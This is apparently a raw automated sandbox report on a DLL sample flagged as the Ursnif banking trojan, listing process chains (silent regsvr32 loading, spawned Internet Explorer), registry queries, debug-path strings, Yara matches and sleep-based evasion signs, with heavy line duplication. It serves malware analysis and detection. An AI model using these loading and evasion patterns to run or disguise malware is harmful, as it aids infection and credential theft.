Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior

Source: classification engine

Classification label: mal80.bank.troj.winDLL@13/132@11/5

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B5946 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,		2_2_044B5946
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B5946 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,		2_2_044B5946

Source: C:\Program Files\internet explorer\iexplore.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4D2E24F3-2A8A-11EB-90E5-ECF4BB570DC9}.dat			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4D2E24F3-2A8A-11EB-90E5-ECF4BB570DC9}.dat			Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe	File created: C:\Users\user\AppData\Local\Temp\~DF06D65394E82C079F.TMP			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	File created: C:\Users\user\AppData\Local\Temp\~DF06D65394E82C079F.TMP			Jump to behavior

Source: 0pz1on1.dll	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 0pz1on1.dll	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior

Source: 0pz1on1.dll	ReversingLabs: Detection: 12%
Source: 0pz1on1.dll	ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2	Jump to behavior
Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6672 CREDAT:82956 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32			Jump to behavior

Source: Window Recorder	Window detected: More than 3 window changes detected
Source: Window Recorder	Window detected: More than 3 window changes detected

Source: 0pz1on1.dll	Static PE information: More than 130 > 100 exports found
Source: 0pz1on1.dll	Static PE information: More than 130 > 100 exports found

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll			Jump to behavior

Source: 0pz1on1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 0pz1on1.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\arithmetization\prevaccinate\anaglypton\heavenlike\bohemian\gearing\phylacobiosis\globulitic.pdb source: 0pz1on1.dll
Source:	Binary string: K:\gonochorismus\vection.pdb source: 0pz1on1.dll
Source:	Binary string: 9J:\uncially\totter.pdb source: 0pz1on1.dll
Source:	Binary string: G:\gharial\staller\dowset.pdb source: 0pz1on1.dll
Source:	Binary string: G:\homeopathy\pectization\sealette\consolato.pdb source: 0pz1on1.dll
Source:	Binary string: \|H:\untrueness\diverticulitis\underspin\unfootsore\rewardful\supercommentator.pdb source: 0pz1on1.dll
Source:	Binary string: Q:\expandedly.pdb source: 0pz1on1.dll
Source:	Binary string: C:\sepiola\coeloblastic\dazy\shrinky\leptostracous\earthwards\fluoridize\borromean\shikimic.pdb source: 0pz1on1.dll
Source:	Binary string: $B:\visceripericardial\regauge\rajbansi\brander\scorpaena\uncoloredness\incubation\meliority.pdb source: 0pz1on1.dll
Source:	Binary string: M:\dodecarch\trisporic.pdb source: 0pz1on1.dll
Source:	Binary string: E:\arithmetization\prevaccinate\anaglypton\heavenlike\bohemian\gearing\phylacobiosis\globulitic.pdb source: 0pz1on1.dll
Source:	Binary string: K:\gonochorismus\vection.pdb source: 0pz1on1.dll
Source:	Binary string: 9J:\uncially\totter.pdb source: 0pz1on1.dll
Source:	Binary string: G:\gharial\staller\dowset.pdb source: 0pz1on1.dll
Source:	Binary string: G:\homeopathy\pectization\sealette\consolato.pdb source: 0pz1on1.dll
Source:	Binary string: \|H:\untrueness\diverticulitis\underspin\unfootsore\rewardful\supercommentator.pdb source: 0pz1on1.dll
Source:	Binary string: Q:\expandedly.pdb source: 0pz1on1.dll
Source:	Binary string: C:\sepiola\coeloblastic\dazy\shrinky\leptostracous\earthwards\fluoridize\borromean\shikimic.pdb source: 0pz1on1.dll
Source:	Binary string: $B:\visceripericardial\regauge\rajbansi\brander\scorpaena\uncoloredness\incubation\meliority.pdb source: 0pz1on1.dll
Source:	Binary string: M:\dodecarch\trisporic.pdb source: 0pz1on1.dll

Source: 0pz1on1.dll	Static PE information: real checksum: 0x24b85 should be: 0x2316b
Source: 0pz1on1.dll	Static PE information: real checksum: 0x24b85 should be: 0x2316b

Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004021C3 push ecx; ret	2_2_004021D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00402170 push ecx; ret	2_2_00402179
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAEDB push ecx; ret	2_2_044BAEEB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAB20 push ecx; ret	2_2_044BAB29
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004021C3 push ecx; ret	2_2_004021D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00402170 push ecx; ret	2_2_00402179
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAEDB push ecx; ret	2_2_044BAEEB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAB20 push ecx; ret	2_2_044BAB29

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6644, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6760	Thread sleep count: 176 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6760	Thread sleep time: -88000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6760	Thread sleep count: 176 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6760	Thread sleep time: -88000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_044B523B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B523B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_044B523B

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior

Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: regsvr32.exe, 00000002.00000002.504757716.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
